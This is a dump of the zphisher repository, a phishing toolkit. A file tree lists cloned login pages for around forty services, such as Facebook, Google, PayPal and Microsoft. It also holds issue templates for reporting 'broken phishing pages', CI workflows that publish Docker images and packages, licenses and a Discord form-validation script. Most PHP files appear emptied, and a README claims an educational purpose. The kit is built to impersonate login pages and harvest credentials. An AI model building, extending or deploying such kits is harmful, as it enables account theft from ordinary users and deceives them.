├── .github ├── ISSUE_TEMPLATE │ ├── 01-bug-report.yml │ ├── 02-broken-page.yml │ └── 03-feature-request.yml ├── misc │ ├── logo.png │ └── workflow.gif └── workflows │ ├── docker.yml │ ├── lock.yml │ └── release.yml ├── .sites ├── adobe │ ├── bg.jpg │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.svg ├── badoo │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.svg ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php ├── discord │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── LICENSE │ ├── banner.png │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── fav.ico │ ├── index.php │ ├── login.html │ ├── login.php │ ├── qr.png │ ├── script.js │ └── style.css ├── dropbox │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── ebay │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.png ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedin │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── style.css ├── mediafire │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── pinterest │ ├── favicon.png │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── bg.jpg │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── art.png │ ├── favicon.png │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── roblox │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── snapchat │ ├── favicon.png │ ├── icon.svg │ ├── index.php │ ├── login.html │ └── login.php ├── spotify │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── stackoverflow │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── steam │ ├── 1.jpg │ ├── 2.jpg │ ├── favicon.ico │ ├── index.php │ ├── join.png │ ├── login.html │ └── login.php ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── favicon.png │ ├── index.php │ ├── login.html │ └── login.php ├── twitter │ ├── index.php │ ├── login.html │ └── login.php ├── vk │ ├── favicon.png │ ├── index.php │ ├── login.html │ └── login.php ├── vk_poll │ ├── counter.gif │ ├── hit.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── p.gif │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ ├── s_z.js │ └── top_logo.png ├── wordpress │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php ├── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png └── yandex │ ├── index.php │ ├── login.html │ └── login.php ├── Dockerfile ├── LICENSE ├── README.md ├── make-deb.sh ├── run-docker.sh ├── scripts └── launch.sh └── zphisher.sh /.github/ISSUE_TEMPLATE/01-bug-report.yml: -------------------------------------------------------------------------------- 1 | name: 🐞 Bug Report 2 | description: Submit a report to help us improve 3 | # title: "[Bug]: " 4 | labels: ["bug"] 5 | 6 | body: 7 | - type: markdown 8 | attributes: 9 | value: | 10 | ***Thanks for taking the time to fill out this report!*** 11 | 12 | - type: dropdown 13 | id: environment 14 | attributes: 15 | label: Which environment you are using ? 16 | multiple: false 17 | options: 18 | - Linux / Desktop 19 | - Termux / Android 20 | - Windows (lol) 21 | 22 | - type: textarea 23 | id: description 24 | attributes: 25 | label: Describe the bug 26 | description: | 27 | *A summary of the issue. Attach screenshots if needed.* 28 | validations: 29 | required: true 30 | 31 | - type: textarea 32 | id: logs 33 | attributes: 34 | render: shell 35 | label: Provide log output [Optional] 36 | description: | 37 | *Copy & paste the log output.* 38 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/02-broken-page.yml: -------------------------------------------------------------------------------- 1 | name: 💔 Broken Page 2 | description: Report broken pages 3 | title: "[Broken Page]: " 4 | labels: ["broken"] 5 | 6 | body: 7 | - type: markdown 8 | attributes: 9 | value: | 10 | ***If you can fix it, consider creating a PR. That would be appreciated.*** 11 | 12 | - type: textarea 13 | id: description 14 | attributes: 15 | label: Which Page is broken ? 16 | description: Name of the phishing page which is broken. Attach screenshot if possible. 17 | validations: 18 | required: true 19 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/03-feature-request.yml: -------------------------------------------------------------------------------- 1 | name: 🚀 Feature Request 2 | description: Suggest an idea for improving zphisher 3 | # title: "[Feature Request]: " 4 | labels: ["enhancement"] 5 | 6 | body: 7 | - type: textarea 8 | id: description 9 | attributes: 10 | label: Is your proposal related to a problem? 11 | description: Provide a clear and concise description of what the problem is. 12 | 13 | - type: textarea 14 | id: solution 15 | attributes: 16 | label: "Describe the solution you'd like" 17 | description: Provide a clear and concise description of what you want to happen. 18 | 19 | - type: textarea 20 | id: context 21 | attributes: 22 | label: "Additional context" 23 | description: | 24 | Is there anything else you can add about the proposal? 25 | *You might want to link to related issues here, if you haven't already.* 26 | 27 | - type: markdown 28 | attributes: 29 | value: | 30 | ***If you can implement the code, consider creating a pull request.*** *Thanks for taking the time to fill out this report!* 31 | -------------------------------------------------------------------------------- /.github/misc/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.github/misc/logo.png -------------------------------------------------------------------------------- /.github/misc/workflow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.github/misc/workflow.gif -------------------------------------------------------------------------------- /.github/workflows/docker.yml: -------------------------------------------------------------------------------- 1 | name: 'Build & Push Docker Image' 2 | 3 | on: 4 | schedule: 5 | - cron: "0 0 * * 0" # Every Sunday 6 | workflow_dispatch: 7 | 8 | env: 9 | CI: true 10 | DOCKER_BUILDKIT: 1 11 | 12 | jobs: 13 | build: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@v3 18 | - name: Build Image 19 | run: | 20 | # Build Docker Image for DockerHub 21 | docker build --tag htrtech/zphisher:latest . 22 | 23 | # Tag Docker Image for GHCR 24 | docker tag htrtech/zphisher:latest ghcr.io/htr-tech/zphisher:latest 25 | 26 | - name: Login to GHCR 27 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 28 | uses: docker/login-action@v2 29 | with: 30 | registry: ghcr.io 31 | username: ${{ github.actor }} 32 | password: ${{ secrets.GITHUB_TOKEN }} 33 | 34 | - name: Login to DockerHub 35 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 36 | uses: docker/login-action@v2 37 | with: 38 | username: "htrtech" 39 | password: ${{ secrets.DOCKER_TOKEN }} 40 | 41 | - name: Push 42 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 43 | run: | 44 | # Push to DockerHub 45 | docker push htrtech/zphisher:latest 46 | # Push to GHCR 47 | docker push ghcr.io/htr-tech/zphisher:latest 48 | -------------------------------------------------------------------------------- /.github/workflows/lock.yml: -------------------------------------------------------------------------------- 1 | name: 'Lock Closed Issues' 2 | 3 | on: 4 | schedule: 5 | - cron: '0 0 * * 0' # Every Sunday 6 | workflow_dispatch: 7 | 8 | permissions: 9 | issues: write 10 | pull-requests: write 11 | 12 | concurrency: 13 | group: lock 14 | 15 | jobs: 16 | action: 17 | runs-on: ubuntu-latest 18 | steps: 19 | - name: Lock Issues 20 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 21 | uses: dessant/lock-threads@v3 22 | with: 23 | process-only: 'issues' 24 | issue-inactive-days: '30' 25 | exclude-any-issue-labels: 'enhancement' 26 | add-issue-labels: 'archived' 27 | remove-issue-labels: 'stale' 28 | issue-lock-reason: 'resolved' 29 | issue-comment: > 30 | This issue has been automatically locked since there 31 | has not been any recent activity after it was closed. 32 | Please open a new issue for related bugs/questions. 33 | -------------------------------------------------------------------------------- /.github/workflows/release.yml: -------------------------------------------------------------------------------- 1 | name: Upload .DEB to Release 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | jobs: 9 | build: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - name: Checkout 13 | uses: actions/checkout@v2 14 | 15 | - name: Build .DEB 16 | run: | 17 | sed -i 's/#PKG_NAME/PKG_NAME/' make-deb.sh 18 | bash make-deb.sh # Build for Debian 19 | bash make-deb.sh termux # Build for Termux 20 | find -type f -name "*.deb" -exec sha256sum "{}" > CHECKSUMS.txt \; 21 | 22 | - name: Upload to Release 23 | uses: softprops/action-gh-release@v1 24 | with: 25 | files: "*.deb" 26 | - uses: softprops/action-gh-release@v1 27 | with: 28 | files: CHECKSUMS.txt 29 | -------------------------------------------------------------------------------- /.sites/adobe/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/adobe/bg.jpg -------------------------------------------------------------------------------- /.sites/adobe/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/adobe/favicon.ico -------------------------------------------------------------------------------- /.sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/adobe/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/adobe/logo.svg: -------------------------------------------------------------------------------- 1 | 25 | -------------------------------------------------------------------------------- /.sites/badoo/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/badoo/favicon.ico -------------------------------------------------------------------------------- /.sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/badoo/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | -------------------------------------------------------------------------------- /.sites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /.sites/discord/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Ali Milani 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | # https://github.com/AliMilani/fake-discord -------------------------------------------------------------------------------- /.sites/discord/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/banner.png -------------------------------------------------------------------------------- /.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /.sites/discord/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/fav.ico -------------------------------------------------------------------------------- /.sites/discord/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/qr.png -------------------------------------------------------------------------------- /.sites/discord/script.js: -------------------------------------------------------------------------------- 1 | let inputs = document.querySelectorAll('form input') 2 | let submitBtn = document.querySelector('form button[type="submit"]') 3 | // submitBtn.addEventListener("click", validateForm) 4 | inputs[1].addEventListener("input", validateForm) 5 | 6 | function validateForm() { 7 | let outlines = document.querySelectorAll('form .input-outline') 8 | let lables = document.querySelectorAll('.colorStandard-21JIj7') 9 | let errMessages = document.querySelectorAll('.errorMessage-1kMqS5') 10 | 11 | for (let i = 0; i < inputs.length; i++) { 12 | inputs[i].addEventListener("input", validateForm) 13 | if (inputs[i].value == '') { 14 | outlines[i].classList.add('error-8r7mjf') 15 | lables[i].classList.add('error-3EBD81') 16 | errMessages[i].style.display = 'inline' 17 | 18 | } else { 19 | outlines[i].classList.remove('error-8r7mjf') 20 | lables[i].classList.remove('error-3EBD81') 21 | errMessages[i].style.display = 'none' 22 | submitBtn.disabled = '' 23 | } 24 | } 25 | (!inputs[0].value == '' && !inputs[1].value == '') ? 26 | submitBtn.disabled = '' : submitBtn.disabled = 'disabled' 27 | 28 | } -------------------------------------------------------------------------------- /.sites/dropbox/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/dropbox/favicon.ico -------------------------------------------------------------------------------- /.sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/dropbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ebay/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/ebay/favicon.ico -------------------------------------------------------------------------------- /.sites/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ebay/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/ebay/logo.png -------------------------------------------------------------------------------- /.sites/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /.sites/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [KasRoudra](https://github.com/KasRoudra) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit -------------------------------------------------------------------------------- /.sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /.sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 22 | 23 |